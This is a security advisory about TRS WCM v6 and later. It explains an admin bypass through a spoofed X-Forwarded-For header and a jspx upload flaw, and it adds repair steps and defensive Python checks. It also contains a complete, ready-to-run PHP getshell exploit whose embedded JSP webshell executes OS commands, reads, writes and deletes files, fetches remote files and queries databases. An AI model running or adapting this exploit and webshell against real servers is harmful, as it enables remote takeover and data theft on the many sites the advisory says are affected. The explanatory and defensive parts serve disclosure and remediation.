TRSWCM background Permission Bypass and GETSHELL (including detailed repair solutions)

Source: Internet
Author: User

Affected versions: TRS WCM v6 and later; v5.x is not affected. No login is required. Note: this vulnerability affects a large number of sites. We are concerned that the details could be disclosed prematurely because of vendor neglect, so we ask the administrator to pass the issue to CNCERT (the National Internet Emergency Center) for handling. Thank you. The relevant code in /WEB-INF/web.xml is as follows:

<servlet>
    <servlet-name>govcontroller</servlet-name>
    <servlet-class>com.trs.webframework.controler.servlet.NoLoginServiceControler</servlet-class>
    <init-param>
        <param-name>AllowIP</param-name>
        <param-value>127.0.0.1</param-value>
    </init-param>
    <init-param>
        <param-name>CurrUser</param-name>
        <param-value>admin</param-value>
    </init-param>
    <init-param>
        <param-name>RedirectURI</param-name>
        <param-value>/center.do</param-value>
    </init-param>
</servlet>
<servlet-mapping>
    <servlet-name>govcontroller</servlet-name>
    <url-pattern>/govcenter.do</url-pattern>
</servlet-mapping>
<servlet>
    <servlet-name>govfileuploader</servlet-name>
    <servlet-class>com.trs.webframework.controler.servlet.NoLoginServiceControler</servlet-class>
    <init-param>
        <param-name>AllowIP</param-name>
        <param-value>127.0.0.1</param-value>
    </init-param>
    <init-param>
        <param-name>CurrUser</param-name>
        <param-value>admin</param-value>
    </init-param>
    <init-param>
        <param-name>RedirectURI</param-name>
        <param-value>/fileuploader.do</param-value>
    </init-param>
</servlet>
<servlet-mapping>
    <servlet-name>govfileuploader</servlet-name>
    <url-pattern>/govfileuploader.do</url-pattern>
</servlet-mapping>


 

The program configures two servlets, govcontroller and govfileuploader, both backed by the same class. Open the corresponding class file, /WEB-INF/lib/trswcmv6/com/trs/webframework/controler/servlet/NoLoginServiceControler.class; after decompilation, its core Java code is as follows:
protected void service(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
        throws ServletException, IOException {
    // The client-supplied X-Forwarded-For header is preferred over the real peer address.
    String s = httpservletrequest.getHeader("X-Forwarded-For");
    if (CMyString.isEmpty(s))
        s = httpservletrequest.getRemoteAddr();
    boolean flag = isAllowIP(s);
    if (!flag) {
        ............ // If the IP address does not match, the error is handled. Code omitted.
    }
    ............ // If the IP address matches, the logon succeeds. Code omitted.
    catch (ServletException servletexception) {
        throw servletexception;
    } finally {
        ContextHelper.clear();
        httpservletrequest.getSession().removeAttribute("WCM52.loginUser");
    }
}

// Dotted-quad comparison against the AllowIP list; "*" in a pattern matches any octet.
private boolean isAllowIP(String s) {
    if (m_pIPs == null)
        return false;
    String as[] = s.split("\\.");
    for (int i = 0; i < m_pIPs.length; i++) {
        String as1[] = m_pIPs[i].split("\\.");
        if (as1.length != as.length)
            continue;
        boolean flag = false;
        int j = 0;
        do {
            if (j >= as.length)
                break;
            if (!as1[j].equals("*") && !as[j].equals(as1[j])) {
                flag = true;
                break;
            }
            j++;
        } while (true);
        if (!flag)
            return true;
    }
    return false;
}

// AllowIP, CurrUser and RedirectURI are read from the init-params in web.xml.
public void init() throws ServletException {
    String s = getInitParameter("AllowIP");
    if (s != null)
        m_pIPs = s.split(",");
    s = getInitParameter("CurrUser");
    if (s != null && (s = s.trim()).length() > 0)
        m_sUserName = s;
    m_sRedirectURI = CMyString.showNull(getInitParameter("RedirectURI"), "/center.do");
    if (!m_sRedirectURI.startsWith("/"))
        m_sRedirectURI = "/" + m_sRedirectURI;
    super.init();
}
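The following is an added example, not TRS WCM code: the AllowIP wildcard matcher from the decompiled isAllowIP() above, ported to Python, next to two ways of deciding which address to feed it. resolve_vulnerable() mirrors the servlet, where any X-Forwarded-For header wins over the TCP peer address. resolve_hardened() honours X-Forwarded-For only when the TCP peer is a proxy the operator trusts (TRUSTED_PROXIES is an assumed deployment value, not from the page) and then takes the right-most entry, the one that proxy appended.

```python
"""Vulnerable vs hardened client-address resolution in front of an AllowIP check."""
from typing import Optional

ALLOW_IP = ["127.0.0.1"]          # value of the AllowIP init-param in web.xml
TRUSTED_PROXIES = {"10.0.0.2"}    # assumed reverse-proxy address, not from the page


def is_allow_ip(addr: str, patterns=ALLOW_IP) -> bool:
    """Port of isAllowIP(): octet-by-octet comparison, '*' matches any octet."""
    parts = addr.split(".")
    for pattern in patterns:
        pat = pattern.split(".")
        if len(pat) != len(parts):
            continue
        if all(p == "*" or p == a for p, a in zip(pat, parts)):
            return True
    return False


def resolve_vulnerable(peer: str, xff: Optional[str]) -> str:
    """What NoLoginServiceControler does: trust the header whenever it is present."""
    return xff.strip() if xff else peer


def resolve_hardened(peer: str, xff: Optional[str]) -> str:
    """Trust the header only behind a known proxy, and only the hop that proxy appended."""
    if peer not in TRUSTED_PROXIES or not xff:
        return peer
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    return hops[-1] if hops else peer


def decide(resolver, peer: str, xff: Optional[str]) -> bool:
    """True when the request would be accepted as the built-in CurrUser."""
    return is_allow_ip(resolver(peer, xff))


if __name__ == "__main__":
    # Constructed cases: a remote peer without the header, the spoof from the
    # advisory, and a legitimate proxy chain that appended the real client.
    cases = [("203.0.113.5", None),
             ("203.0.113.5", "127.0.0.1"),
             ("10.0.0.2", "127.0.0.1, 198.51.100.7")]
    for peer, xff in cases:
        print(f"peer={peer:<14} xff={str(xff):<28} "
              f"vulnerable={decide(resolve_vulnerable, peer, xff)} "
              f"hardened={decide(resolve_hardened, peer, xff)}")
```

The hardened resolver assumes the trusted proxy appends the connecting client's address to X-Forwarded-For, which is why it reads the last hop rather than the first; a proxy that forwards the header untouched would still let a spoofed first entry through, so the proxy configuration has to be verified alongside the application change.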

 

From the code above it is easy to see that the program calls httpservletrequest.getHeader() to read the X-Forwarded-For value from the HTTP request headers, then calls isAllowIP() to compare it against the AllowIP value that init() read from web.xml (127.0.0.1). If they differ, the program exits with an error; if they match, the session is created successfully. In summary, if X-Forwarded-For in the request header is set to 127.0.0.1, the program treats the caller as the built-in admin user, and center.do and fileuploader.do can be called with that identity. Because X-Forwarded-For is an arbitrary client-supplied header, the check does not actually establish that the request came from localhost.

govcenter.do is used below: first query the user's userid, then modify the login user's password and other information. We can see that the userid corresponding to the test1 user is 2 and the password is 621EE7AEAFA2281, and that the username and password of the user whose userid is 2 have all been modified. For example, querying the hitest user information again shows the userid still 2, but the account and password updated.

The second vulnerability is the govfileuploader.do upload vulnerability. The corresponding class file is /WEB-INF/lib/trswcmv6/com/trs/webframework/controler/servlet/FileUploader.class; after decompilation, its core Java code is:

protected void service(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse) {
    byte abyte0[];
    ......
    // The whole request body is taken as the file content.
    abyte0 = StreamBuddy.readFromInputStream(httpservletrequest.getInputStream());
    ......
    try {
        String s = null;
        // Extension and target-directory flag both come from request headers.
        String s1 = httpservletrequest.getHeader("FileExt");
        String s2 = httpservletrequest.getHeader("FileFlag");
        if (CMyString.isEmpty(s2))
            s2 = "U0";
        FilesMan filesman = FilesMan.getFilesMan();
        String s3 = null;
        String s4 = null;
        s3 = filesman.getNextFilePathName(s2, s1);
        CMyFileX.writeFile(s3, abyte0);
        s4 = CMyFile.extractFileName(s3, "/");
        s4 = CMyFile.extractFileName(s4, "\\");
        java.io.PrintWriter printwriter1 = httpservletresponse.getWriter();
        s = s4;
        // The generated file name is echoed back to the caller.
        if (s == null)
            printwriter1.write("");
        else if (s instanceof String)
            printwriter1.write("<result><ShowName><![CDATA[" + CMyString.encodeForCDATA((String) s) + "]]></ShowName></result>");
        else
            printwriter1.write(I18NMessage.get(com.trs.webframework.controler.servlet.FileUploader.class,
                    "FileUploader.label1", "<result>unsupported processing type [") + s.getClass() + "]!</result>");
        ......
    }
    ......
}

The program uses httpservletrequest.getHeader() to read the FileExt and FileFlag values, then calls filesman.getNextFilePathName(s2, s1) to generate a file name. Note that the value of s2 (FileFlag) is one of U0, P0, W0, TM, LP and SF; these correspond to the directories in which files are stored on the server. Of these, TM, LP, W0 and LV correspond exactly to four virtual directories in the default TRS Tomcat configuration, as follows:

    id    path
    TM    $TRSHOME$\TRSWCMV65\WCMData\template\
    LP    $TRSHOME$\TRSWCMV65\WCMData\pub\
    W0    $TRSHOME$\TRSWCMV65\WCMData\webpic\
    LV    $TRSHOME$\TRSWCMV65\WCMData\preview\

The Tomcat configuration is as follows: open E:\TRS1\TRSWCMV65\WCMData\webpic\WEB-INF\web.xml. Its content shows that the access-denied filter configured by the program applies only to the .jsp suffix; the .jspx suffix is not restricted. Therefore, during the upload, the FileExt header that controls the suffix of the saved file is set to jspx. The complete upload request follows.
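As an added example (not TRS WCM code), the check below shows why a .jsp-only deny rule of the kind described above fails and what an allow-list check placed in front of FileUploader's file-name generation looks like. denylist_accepts() reproduces the page's observation that jsp is blocked while jspx is not; allowlist_accepts() admits only the extensions the upload feature actually needs (ALLOWED_EXTENSIONS is an assumed per-site policy, not a TRS setting).

```python
"""Deny-list versus allow-list validation of a client-supplied file extension."""
from typing import Optional

DENIED_EXTENSIONS = {"jsp"}                                  # what the described filter amounts to
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}    # assumed policy, not from the page


def normalize_ext(file_ext: Optional[str]) -> Optional[str]:
    """Lower-case and strip surrounding whitespace and leading dots; None if nothing is left."""
    if file_ext is None:
        return None
    ext = file_ext.strip().lower().lstrip(".")
    return ext or None


def denylist_accepts(file_ext: Optional[str]) -> bool:
    """Literal comparison against a deny list, as the .jsp-only filter behaves."""
    return file_ext not in DENIED_EXTENSIONS


def allowlist_accepts(file_ext: Optional[str]) -> bool:
    """Accept only a normalized, purely alphanumeric extension from the allow list."""
    ext = normalize_ext(file_ext)
    return ext is not None and ext.isalnum() and ext in ALLOWED_EXTENSIONS


def evaluate(candidates):
    """Return {extension: (denylist_decision, allowlist_decision)} for a batch of inputs."""
    return {c: (denylist_accepts(c), allowlist_accepts(c)) for c in candidates}


if __name__ == "__main__":
    # Constructed header values, including the jspx case from the advisory.
    for ext, (deny, allow) in evaluate(["jpg", "jsp", "jspx", ".PNG", "", None]).items():
        print(f"FileExt={ext!r:10} denylist accepts={deny!s:5} allowlist accepts={allow}")
```

The allow-list form also rejects values containing dots, slashes or other separators, so a FileExt that tries to smuggle a path component into getNextFilePathName() is refused before a file name is ever built.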

A getshell exploit is attached, for testing only:
<?php$host=@$argv[1];$port=@$argv[2];$wcmpath=@$argv[3];if(eregi("https://",$host)){$host=explode("https://",$host);$host=$host[1];$pre="https://";$host=str_replace("/","",$host);//echo $host."\r\n";}if(eregi("http://",$host)){$host=explode("http://",$host);$host=$host[1];$pre="http://";$host=str_replace("/","",$host);//echo $host."\r\n";}if(!$host or !$port or !$wcmpath or !@$pre or !is_numeric($port))exit("=================================================TRS WCM>=6 GETSHELL=================================================Usage: php wcm.php host port wcmpathExample: php wcm.php http://www.qq.com 80 wcmExample: php wcm.php https://www.qq.com 8000 wcm=================================================");//preg_match();function http_send($host, $port, $packet){$sock = fsockopen($host, $port);while (!$sock){$sock = fsockopen($host, $port);}fputs($sock, $packet);while (!feof($sock)) @$resp .= fread($sock, 1024);fclose($sock);//print $resp;return $resp;}$data='<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2"><jsp:directive.page contentType="text/html" pageEncoding="UTF-8" /><jsp:directive.page import="java.io.*"/><jsp:directive.page import="java.util.*"/><jsp:directive.page import="java.net.*"/><jsp:directive.page import="java.sql.*"/><jsp:directive.page import="java.text.*"/><jsp:declaration>String Pwd="023320a1232222a";String cs="UTF-8";String EC(String s)throws Exception{return new String(s.getBytes("ISO-8859-1"),cs);}Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if(x.length>4){c.setCatalog(x[4]);}return 
c;}}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i&lt;r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0; i&lt;l.length; i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ +=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0; k &lt; x.length; k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"&lt;-").getBytes(),0,3);os.close();is.close();}void GG(String s,String d)throws Exception{String h="0123456789ABCDEF";File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0; i&lt;d.length();i+=2){os.write((h.indexOf(d.charAt(i)) &lt;&lt; 4 | h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0; j&lt;z.length; j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void 
JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s,String d)throws Exception{URL u=new URL(s);int n=0;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection) u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is,StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"\r\n");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] x=s.trim().split("\r\n");ResultSet r=c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null,"%",new String[]{"TABLE"});while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i&lt;=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb,String p)throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1; i &lt;=n; 
i++){sb.append(d.getColumnName(i)+"\t|\t");}sb.append("\r\n");if(q.indexOf("--f:")!=-1){File file=new File(p);if(q.indexOf("-to:")==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:")+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1; i&lt;=n;i++){if(q.indexOf("--f:")!=-1){bw.write(r.getObject(i)+""+"\t");bw.flush();}else{sb.append(r.getObject(i)+""+"\t|\t");}}if(bw!=null){bw.newLine();}sb.append("\r\n");}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}</jsp:declaration><jsp:scriptlet>cs=request.getParameter("z0")!=null?request.getParameter("z0")+"":cs;response.setContentType("text/html");response.setCharacterEncoding(cs);StringBuffer sb=new StringBuffer("");try{String Z=EC(request.getParameter(Pwd)+"");String z1=EC(request.getParameter("z1")+"");String z2=EC(request.getParameter("z2")+"");sb.append("->"+"|");String s=request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else 
if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\","/")+"images/");}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"&lt;-");out.print(sb.toString());</jsp:scriptlet></jsp:root>';function postdata($host,$port,$wcmpath,$data){$packet  = "POST /{$wcmpath}/govfileuploader.do HTTP/1.0\r\n";$packet .= "Host: {$host}:{$port}\r\n";$packet .= "FileExt: jspx\r\n";$packet .= "FileFlag: W0\r\n";$packet .= "X-Forwarded-For: 127.0.0.1\r\n";$packet .= "Content-Length: ".strlen($data)."\r\n\r\n";$packet .= $data." ";return $packet;}$packet=postdata($host,$port,$wcmpath,$data);//echo $packet."\r\n";$html=http_send($host,$port,$packet);//echo $html."\r\n";if(!eregi("HTTP/1.1 404 Not Found",$html)){if(strpos($html,"jspx")){$patten="/A\[(.*?)\]\]/i";preg_match($patten,$html,$url);if(strpos($url[1],".jspx")){$shell=$pre.$host.":{$port}/webpic/".substr($url[1],0,8)."/".substr($url[1],0,10)."/".$url[1];echo "Getshell Successed!\r\n";echo $shell."\r\n";}elseecho "Failed!";}elseexit("Failed!");}?>

 

Solution: delete the following code from NoLoginServiceControler.java, so that the variable is always taken from httpservletrequest.getRemoteAddr() (the real TCP peer), leaving String s = httpservletrequest.getRemoteAddr(); in its place, rather than from the client-controlled X-Forwarded-For header:

String s = httpservletrequest.getHeader("X-Forwarded-For");
if (CMyString.isEmpty(s))

Note that after this change the servlet still grants the CurrUser identity to any request arriving from an address in AllowIP. If a reverse proxy runs on the same host as Tomcat, every request reaches Tomcat from 127.0.0.1, so the AllowIP value must be reviewed together with the deployment topology.
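As an added example (not part of the advisory or TRS WCM), the detection logic below runs over a few constructed Tomcat access-log lines to surface attempts at the bypass described above. The log format is assumed to be the common pattern with the X-Forwarded-For header appended as the last quoted field (AccessLogValve pattern '%h %l %u %t "%r" %s %b "%{X-Forwarded-For}i"'); adjust the regex if your deployment logs differently. A request to one of the no-login endpoints is flagged whenever the TCP peer is not loopback, and rated high when the header also claims a loopback address, which is the spoof this advisory describes.

```python
"""Flag remote access to the no-login endpoints, especially with a spoofed loopback X-Forwarded-For."""
import ipaddress
import re

NO_LOGIN_ENDPOINTS = ("/govcenter.do", "/govfileuploader.do")

LOG_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<xff>[^"]*)"$'
)

# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2014:10:15:02 +0800] "POST /wcm/govfileuploader.do HTTP/1.0" 200 143 "127.0.0.1"
127.0.0.1 - - [10/Jan/2014:10:15:09 +0800] "GET /wcm/govcenter.do HTTP/1.1" 200 512 "-"
198.51.100.7 - - [10/Jan/2014:10:16:30 +0800] "GET /wcm/index.jsp HTTP/1.1" 200 2048 "-"
203.0.113.5 - - [10/Jan/2014:10:17:41 +0800] "GET /wcm/govcenter.do?a=1 HTTP/1.1" 200 981 "10.1.2.3, 127.0.0.1"
198.51.100.7 - - [10/Jan/2014:10:18:05 +0800] "GET /wcm/govcenter.do HTTP/1.1" 302 0 "-"
"""


def _is_loopback(addr):
    try:
        return ipaddress.ip_address(addr.strip()).is_loopback
    except ValueError:
        return False


def classify(line):
    """Return (severity, parsed_record) for a suspicious line, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path = rec["path"].split("?", 1)[0]          # drop the query string before matching
    if not path.endswith(NO_LOGIN_ENDPOINTS):
        return None
    if _is_loopback(rec["peer"]):
        return None                              # genuinely local, as AllowIP intends
    hops = [h for h in rec["xff"].split(",") if h.strip() and h.strip() != "-"]
    if any(_is_loopback(h) for h in hops):
        return ("high", rec)                     # remote peer claiming to be localhost
    return ("medium", rec)                       # remote peer reaching a no-login endpoint


def find_suspicious(log_text):
    """Scan a whole log and return one dict per flagged request, in log order."""
    hits = []
    for line in log_text.splitlines():
        result = classify(line)
        if result:
            severity, rec = result
            hits.append({"severity": severity, "peer": rec["peer"],
                         "path": rec["path"], "xff": rec["xff"], "time": rec["time"]})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"[{hit['severity']:6}] {hit['time']} {hit['peer']} -> {hit['path']} xff={hit['xff']!r}")
```

The medium-severity case matters even after the X-Forwarded-For fix is applied: any non-loopback peer reaching govcenter.do or govfileuploader.do is traffic the AllowIP design never intended, so it is worth alerting on regardless of what the header says.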

 

